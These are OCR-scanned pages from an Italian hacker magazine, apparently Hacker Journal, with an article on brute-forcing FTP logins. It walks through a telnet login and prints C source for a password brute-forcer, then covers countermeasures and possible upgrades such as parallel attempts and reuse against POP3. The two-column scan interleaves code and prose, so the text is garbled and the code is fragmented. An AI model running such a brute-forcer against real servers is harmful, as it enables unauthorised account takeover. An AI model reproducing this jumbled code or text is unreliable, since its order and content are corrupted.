Caio, che però non ne sa nulla.
come:
- Un file con estensione doppia come, per
esempio, nomefile.txt.exe
symantec.com/
http://security.babel.it/klez
.html
{RoSwElL}

www.hackerjournal.it | 27
Programmazione

COMPRENDERE E PREVENIRE GLI ATTACCHI BRUTEFORCE A SERVER FTP

Il meccanismo di autenticazione del


protocollo Ftp presta il fianco a un
attacco semplice ma
efficace: tentare tutte le
possibili combinazioni di
password.

reva.it, ftp.libero.it, ecc....). Magicamente vedrete che, se il

T
servizio è attivo, il server vi risponderà:
ra i vari servizi che un server mette a disposizione, mol-
to comunemente vi è l'FTP. Per accedervi bisogna colle- 220 FTP server NcFTPd connect
garsi alla porta numero 21 e autenticarsi. Facciamo un
esempio. Molti di voi avranno un sito internet. Nella (la frase varia da server a server ma il numero rimane ugua-
stragrande maggioranza dei casi, lo spazio è messo a le) Proseguite la comunicazione come segue:
disposizione dal proprio provider e risiede sul server dell'ISP stesso.
Per potervi depositare le proprie pagine Html tutti avrete dovuto uti- user vostrousername (utente)
lizzare uno dei vari programmi come WS_FTP e, dopo aver impo- 331 vostrousername login require password
stato il proprio username e la password, avrete cominciato le ope- (server)
razioni di trasferimento file. pass vostrapassword (utente)
Il programma che voi avete utilizzato, altro non ha fatto se non 230 login OK, password accepted (server)
creare una connessione sulla porta 21 del server e, rispettando le
specifiche del protocollo FTP, inviare i vostri dati di login per poi po- (solo i numeri sono standard, le frasi dipendono dal demone
ter dare i comandi PUT e GET (invio e ricezione file). La stessa co- del server) Se lo username e la password da voi inserite sono
sa avreste potuto simularla anche a mano grazie al Telnet. Prova- corrette, ora siete dentro al servizio. Nel caso abbiate spedito
te ad aprire telnet (in Windows lo trovate in c:\windows\telnet.exe) un dato non esatto, il server vi avrà risposto con:
digitando la seguente stringa dal prompt:
421 disconnecting
telnet ftp.provider.it 21
oppure con un messaggio che indica che la connessione è
al posto della parola provider mettete il vostro ISP (ftp.supe- stata terminata a causa di un nome utente o una password

28 | www.hackerjournal.it
>>
sbagliata: #include <stdlib.h>
#include <unistd.h>
530 Login incorrect #include <errno.h>
#include <string.h>
Oltre che a depositare pagine web, i servizi FTP servono an- #include <math.h>
che ad altri scopi, tra cui il download di file da aree protette, /*Librerie necessarie per poter usare*/
riservate solo a utenti autorizzati. Sia che si possieda un ac- /*strutture specifiche di rete*/
count ftp per pubblicare un sito Web, o si amministri un ser- #include <netdb.h>
ver Ftp, per aumentare la propria sicurezza bisogna #include <sys/types.h>
conoscere le più comuni tecniche di attacco. Tra queste, #include <sys/socket.h>
la più semplice è probabilmente l’attacco a forza bruta: un
software prova ripetutamente tutte le combinazioni di pas- #define PORT 21 /*Porta del servizio FTP*/
sword possibili, fino a trovare quella giusta. #define MAXLENGTH 5 /*Lunghezza massima*/
Questa tecnica si può applicare con due varianti: attraverso /*della password*/
l'uso di un dizionario (un file contenente le password più void opensock(); /*Prototipi di funzione*/
comuni) o con un puro attacco a forza bruta, provando void creapassword(char *passw, long num);
tutte le combinazioni di caratteri che compongono la int sockfd; /*Dichiarazione*/
password. Noi vedremo la seconda, anche se con piccole /*variabili globali*/
modifiche al codice si possono provare entrambe. Il codice char buffer[100]; /*Buffer per I dati*/
che segue gira sotto sistemi operativi *nix e non sotto Win- /*da ricevere*/
dows (anche se il porting è piuttosto semplice). struct hostent *he;
A scanso di equivoci ricordiamo che questi programmi ven- struct sockaddr_in address;
gono spiegati a puro scopo di conoscenza, o per essere pro- int alfamin,alfamax;
vati sul proprio server allo scopo di aumentarne la sicurezza.
Il loro utilizzo senza autorizzazione contro server al- int main(int argc, char*argv[]) {
trui è un reato penale e porterà sicuramente a delle gra- /*Notare qui di seguito il più uno:*/
ne legali. Questo vale anche se si attacca il proprio sito in ho- /*servirà ad assicurare la possibilità
sting presso un provider, perché la macchina attaccata è la /*di usare il carattere di fine stringa*/
sua, non la vostra. char password[MAXLENGTH+1];
int max,i,response;
long j;
>> Il codice /*Variabile su cui costruiremo*/
/*la stringa da spedire*/
La prima cosa da fare è aprire una connessione, poi bisogna char *stringa;
decidere l'alfabeto da usare, cercando di restringere il nume- /*Controllo se gli argomenti sono*/
ro di tentativi. Se si suppone che l’alfabeto valido sia /*Quattro come richiesto*/
"abcd12", il bruteforce proverà: if (argc!=4){
fprintf(stdout,"Use mode: %s <a|A>
"a", "b",...,"aa","ab","ac",...,"2ad1",... <number> <url> <userID>",argv[0]);
fprintf(stdout,"\na =>
Il limite massimo di tentativi è ovviamente dato dal numero di \"abcdefghijklmnopqrstuvwxyz\"");
caratteri che compone la password (alfabeto). fprintf(stdout,"\nA =>
La scelta dell’alfabeto la lasceremo all'utente grazie a un \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"");
parametro inviato durante la chiamata del programma. Un fprintf(stdout,"\nnumber => max length of
altra cosa da decidere è il numero massimo di caratteri della password (1..%d)",MAXLENGTH);
password. Anche in questo caso la scelta spetta a chi fprintf(stdout,"\nurl => url of
lancia il programmino. Bisogna inoltre passare al software FTPserver");
l'indirizzo del server, e lo username. fprintf(stdout,"\nuserID =>
Per quanto riguarda la porta, l'FTP utilizza due porte: la 21 username\n\n");
per le comunicazioni e i comandi, mentre la 20 per gli stream exit(1);
di dati. In ogni caso, il socket deve essere aperto con la por- };
ta 21, e possiamo disinteressarci del resto. /*Imposta il range ASCII dei caratteri*/
Invece di analizzare poche righe di codice alla volta, abbia- /*da usare*/
mo preferito inserire dei commenti in ogni punto in if (argv[1]=="a") {alfamin=97 ;alfamax=122
cui sia necessario (sono racchiusi tra i simboli /*); leggete- ;}
li attentamente per capire il funzionamento del programma. else if(argv[1]=="A") {alfamin=65
Il codice assumerà il seguente aspetto: ;alfamax=90 ;}
else {fprintf(stdout,"Select a right
/*Dichiarazione delle librerie da includere*/ alphabet of bruteforcing\n");
#include <stdio.h> exit(1);};

www.hackerjournal.it | 29
Programmazione

COME DIROTTARE PACCHETTI DENTRO A UNA RETE LOCALE

/*Imposto il numero Massimo di caratteri*/ response=send(sockfd,stringa,sizeof(stringa),


/*per la password*/ 0);
if (((max=atoi(argv[2]))<1) || /*Se non riesco a spedire la stringa*/
(max>MAXLENGTH)) { /*provo a riaprire il socket*/
fprintf(stdout,"Select a right value for if (response<sizeof(stringa)) {
max length of password\n"); opensock();
exit(1);
}; response=send(sockfd,stringa,sizeof(stringa),
/*Cerco di risolvere il nome inserendo*/ 0);
/*in he l’IP numerico*/ };
if ((he=gethostbyname(argv[3]))==NULL) { response=recv(sockfd,buffer,100,0);
fprintf(stdout,"URL unknown: impossible /*Verifico il numero nella risposta*/
resolve it with DNS\n"); /*del server*/
exit(1); if ((response=atoi(buffer))==230) {
}; /*Se il server mi risponde 230, */
/*Se i vari controlli sulla chiamata*/ /*il login ha avuto successo: */
/*danno l'OK apro la connessione */ /* scrivi la password ed esci. */
opensock(); fprintf(stdout,"Password =
/*Svuoto la password*/ %s\n",password);
for (i=0;i<MAXLENGTH+1;i++) password[i]=' '; free(stringa);
/*Inizia il bruteforce calcolando*/ exit(0);
/*il numero di combinazioni*/ };
stringa=malloc(25); /*Se sono qui vuol dire che non ho*/
/*Esegue (26 elevato alla max) tentativi*/ /*ancora scovato la password*/
/* di login*/ /*Rimango in ciclo e provo con*/
for (j=1;j<=pow(26,max);j++) { /*una nuova parola*/
strcpy(stringa,"user "); };
strcat(stringa,argv[4]); fprintf(stdout,"Password not found.
/*Creata la stringa “user username”*/ Sorry!\n");
/*la spedisco*/ free(stringa);
return 0;
response=send(sockfd,stringa,sizeof(stringa), };
0);
/*Se non riesco a spedire la stringa*/ void opensock() {
/* provo a riaprire il socket*/ int resp;
if (response<sizeof(stringa)) { /*Apro un socket di tipo TCP/IP */
opensock(); if((sockfd=socket(AF_INET, SOCK_STREAM,
0))== -1) {
response=send(sockfd,stringa,sizeof(stringa), fprintf(stdout,"Socket error\n");
0); exit(1);
}; };
response=recv(sockfd,buffer,100,0); /*Imposto il socket al fine di*/
/*Verifico il numero nella risposta*/ /*connettermi sulla porta 21 del server*/
/*del server*/ address.sin_family=AF_INET;
if ((response=atoi(buffer))!=331) { address.sin_port=htons(PORT);
/*Se la rispo. è diversa da 331,*/ address.sin_addr=*((struct in_addr *)he-
/*il server non ha accettato lo username*/ >h_addr);
fprintf(stdout,"Attention: strange memset(&(address.sin_zero),'\0',8);
answer from server\n"); /*Tento la connessione */
free(stringa); if (connect(sockfd,(struct sockaddr
exit(1); *)&address,sizeof(struct sockaddr)) == -1) {
}; fprintf(stdout,"Impossible connect to
/*Chiamo la funzioni*/ server!\n");
/*di creazione password*/ exit(1);
creapassword(password,j); };
strcpy(stringa,"pass "); resp=recv(sockfd,buffer,100,0);
strcat(stringa,password); /*Verifico che la prima risposta */
/*Creo la stringa “pass password”*/ /*del server inizi per 220*/
/* e la spedisco*/ if ((resp=atoi(buffer))!=220) {
/*se è 220 allora e’ pronto a ricevere*/

30 | www.hackerjournal.it
>>
/*I dati di login, altrimenti esci*/ to a sproposito da chi non è in grado di capirne il funzionamento,
fprintf(stdout,"Strange answer from abbiamo volutamente inserito un errore che farà blocca-
server\n"); re il programma dopo il primo tentativo (cosa non si fa per
exit(1); tener buoni gli script kiddy).
};
};
>> Contromisure
Fin qui nulla di strano: apriamo la connessione, verifichiamo che
ogni risposta del server sia corretta, e tentiamo il login, finché non Per utenti senza particolari privilegi, come possono esserlo i più,
ho provato tutte le combinazioni, o ancor meglio ho trovato la pas- l’unica difesa consiste nella scelta di una password “diffi-
sword. Il ciclo for, come si può vedere, impone come limite il nu- cile”. Per difficile si intende una password la cui forzatura risulti al-
mero 26 elevato alla lunghezza massima della password: queste goritmicamente complessa (ma non sarà mai impossibile). Per fa-
sono tutte le effettive possibili stringhe creabili con il nostro alfabe- re questo è consigliabile optare per una parola di almeno 8 carat-
to (composto da 26 caratteri). teri, che non abbia senso compiuto, e che utilizzi non solo lette-
Ogni volta verifico che il servizio non abbia fatto cadere la con- re, ma anche numeri ed eventuali segni di punteggiatu-
nessione, nel qual caso allora cerco di ripristinarla. ra permessi dal parser del server. Non serve che sia qualcosa di
La parte più importante è la seguente: la funzione per creare le casuale, potrebbe anche solo essere composta dalle consonati del
password. L'algoritmo non è il meglio sul mercato, ma svolge di- nostro nome e da un numero sostitutivo per le vocali, e con in mez-
gnitosamente il suo lavoro. Notate come calcoli la parola segreta zo un interpunzione: per esempio se uno si chiama Andrea la pas-
in base al numero di combinazione a cui siamo giunti. sword potrebbe essere 4Nd.R34. Ovviamente, una sequenza
Alla fine della password devo inserire il carattere di terminazione casuale è molto meglio di una soluzione di questo tipo,
stringa, altrimenti rischio (anzi è certo che lo ottenga) l’errore. Ve- perché una password così composta può essere facilmente indovi-
diamola: nata senza nemmeno bisogno di programmi particolari.
Se invece avete privilegi di superutente sul servizio, potete ricorrere
void creapassword(char *passw,long num) { alla tecnica più in voga oggi: in caso di un eccessivo numero
int pos=0; di tentativi o di connessioni consecutive, si può inibire
int resto; l’accesso a quell’IP. Tecnicamente anche questo metodo non e’
long n ; però a prova di bomba: se ad arrivare sono pacchetti spoofati co-
/*crea password di un carattere*/ me quelli di un servizio a noi necessario, inibendolo si perde l’uso
if (num==1) { del servizio stesso; e poi l’attacker potrebbe settare il programma
*(passw)=alfamin; affinché lasci correre un certo intervallo tra una sessione di login
*(passw+1)='\0'; ed un’altra: così facendo aumenta il tempo di esecuzione, ma il
return; gioco potrebbe valere la candela!
}; Anche altre tecniche risultano efficaci, ma con un po’ di immagi-
/*Per password più lunghe di un carattere*/ nazione si vede anche quali sono i limiti… Scovare le password
/*usa la seguente tecnica: */ non è mai infattibile, e mai potrà esserlo.
/*dividi la password come una potenza*/ Il codice visto sopra, non esegue un'ottima gestione degli errori.
/*di 26 e inserisci il carattere */ Inoltre si potrebbe migliore l'algoritmo di bruteforce, aprendo più
/*corrispondente alla A sommata al*/ thread (grazie al comando C fork()), eseguendo così più tentativi
/*resto della divisione nella prima */ contemporaneamente, e riducendo di conseguenza il tempo di
/*posizione libera dell’array*/ esecuzione. Si potrebbe inoltre consentire di provare combinazioni
/*di caratteri*/ che cominciano con un prefisso statico (magari perché si sa già co-
/*Sostanzialmente converte il numero*/ me inizia la password). Tali migliorie, ovviamente esulano dallo
/*di tentativo da base 10 a base 26: */ scopo dell'articolo, e le lascio a voi.
/*il risultato della conversione è*/ Avrete notato, che il programma potrebbe essere utilizzato tramite
/*la parola da provare. */ semplicissime modifiche per forzare anche altri servizi (ad esempio
for (n=(--num);num>0;pos++){ POP3). Tutto dipende dalla fantasia dell'attacker, e dalle sue cono-
resto=num%26; scenze dei vari protocolli.
num/=26;
*(passw+pos)=resto+alfamin; Infine…
}; Voglio inoltre aggiungere che molti dei defacciatori di siti utilizza-
/*Inserisco il carattere di fine stringa*/ no proprio il bruteforce visto sopra. Queste persone, credono di es-
*(passw+pos)='\0'; sere hacker e si vantano per questo delle loro imprese. Lascio a voi
}; decidere se tali lamer possono definirsi hacker e effettivamente
hanno dovuto sfruttare al meglio le loro conoscenze informatiche,
Fatto. Compiliamo e lanciamo. Consiglio un redirect dello o se hanno solo fatto uso di qualche ritaglio di codice trovato per
standard output, al fine di trovare solo l’esito dell’operazione la rete. Io credo che il rovinare dei siti solo per poi van-
senza dover aspettare che finisca: modificando i parametri tarsene sia da idioti. Mi aspetto quindi che le informazioni
potrei trovarmi ad avere un numero spropositato di combinazioni. apprese oggi siano utilizzate con coscienza. K
Un’ultima precisazione sul programma: per evitare che venga usa- LOXEO

www.hackerjournal.it | 31

Potrebbero piacerti anche